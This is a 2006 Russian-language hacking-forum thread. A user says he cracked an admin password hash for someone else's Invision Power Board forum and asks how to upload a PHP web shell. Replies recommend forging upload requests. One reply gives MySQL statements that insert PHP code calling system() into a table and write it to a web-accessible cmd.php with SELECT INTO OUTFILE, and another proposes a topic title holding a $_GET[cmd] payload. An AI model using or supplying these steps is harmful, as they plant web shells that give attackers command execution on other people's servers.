Форумы Вопрос о заливке шелла на форуме Powered by Invision Power Board(U) v1.3 Final

Discussion in 'Уязвимости CMS/форумов' started by 0verfe1, 6 Jan 2006.

  1. 0verfe1

    0verfe1 New Member

    Joined:
    28 Aug 2005
    Messages:
    12
    Likes Received:
    2
    Reputations:
    -2
    Powered by Invision Power Board(U) v1.3 Final
    короче получил хеш,расшифровал,захожу в админку,в смайлики пытаюсь закачать шелл пишет :
    Upload Fallito!
    пытался настраивать разрешенные типы файлов( разрешал *.phtml) и всё равно не пашет,может на форуме были подобные темы,но просьба мне дать нормальное объяснение как закачать шелл в таких обстоятельствах =)
    плизз
     
    1 person likes this.
  2. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Хех, ну скорее всего он пишет Upload Failed, а не то, что написал ты...
    Если залить шелл в папку со смайликами не удаётся (папка закрыта на запись), то тогда попробуй через подделку HTTP запросов залить в папку uploads. Как это сделать читай тут: http://antichat.ru/txt/IPB/index2.php
    ЗЫ: И таких тем полно по форуму! Не ленись пользоваться поиском! Вот к примеру: http://forum.antichat.ru/thread11725.html
     
    1 person likes this.
  3. 0verfe1

    0verfe1 New Member

    Joined:
    28 Aug 2005
    Messages:
    12
    Likes Received:
    2
    Reputations:
    -2
    как раз Upload Fallito!,форум итальянский..
    я это видел раньше,но всё как-то там замудренно,я думаю ща придётся разбиратся
     
  4. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    "Замудренно"? Там всё так расписано, что не суметь повторить этого я думаю очень сложно. Статья написана очень подробно и понятно имхо.
     
    #4 FQziT, 6 Jan 2006
    Last edited: 6 Jan 2006
  5. 0verfe1

    0verfe1 New Member

    Joined:
    28 Aug 2005
    Messages:
    12
    Likes Received:
    2
    Reputations:
    -2
    вот мне только не понятно 7d43942c405bc что это за значение ? и откуда я его могу взять ? без него отправить получилось но скрипта на месте не оказалось..
     
  6. rent0n

    rent0n Elder - Старейшина

    Joined:
    25 Dec 2005
    Messages:
    119
    Likes Received:
    19
    Reputations:
    2
    Попробуй залить через mysql. Где-то на рстшном форуме была статейка, ну примерно вот так:
    create table ibf_shell(myshell char(50));
    Insert into ibf_shell(myshell) values('<?тут пишешь php-команды, типа system("id")?>');
    Select myshell from ibf_shell into outfile 'тут полный путь к файлу, типа /home/qwerty/www/uploads/cmd.php';
    Если прав на аутфайл хватит, то считай что тебе повезло. Кроме того, ели включены register_globals, то можешь ввести что-то типа этого system($_GET)(вроде так). НО!
    Я юзал так несколько форумов, и прав на вывод в outfile у меня не хватало, т.е. было
    permission denied for user admin@localhost :( .
    Если помог - ткни на репутацию... ;)
     
    1 person likes this.
  7. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,097
    Likes Received:
    672
    Reputations:
    591
    да ты прав такой способ катит...еще один вариант создаешь темку с названием
    <? $_GET[cmd]; ?>
    потом с тем же outfile-ом выводишь эти строки в файл, просто надо тада запомнить столбец в котором нах-ся названия тем(я в мускуле не силен надеюсь прально сказал=)))
     
  8. rent0n

    rent0n Elder - Старейшина

    Joined:
    25 Dec 2005
    Messages:
    119
    Likes Received:
    19
    Reputations:
    2
    Повторюсь, если админ не полный кретин, то прав на вывод в outfile не хватит
     
Loading...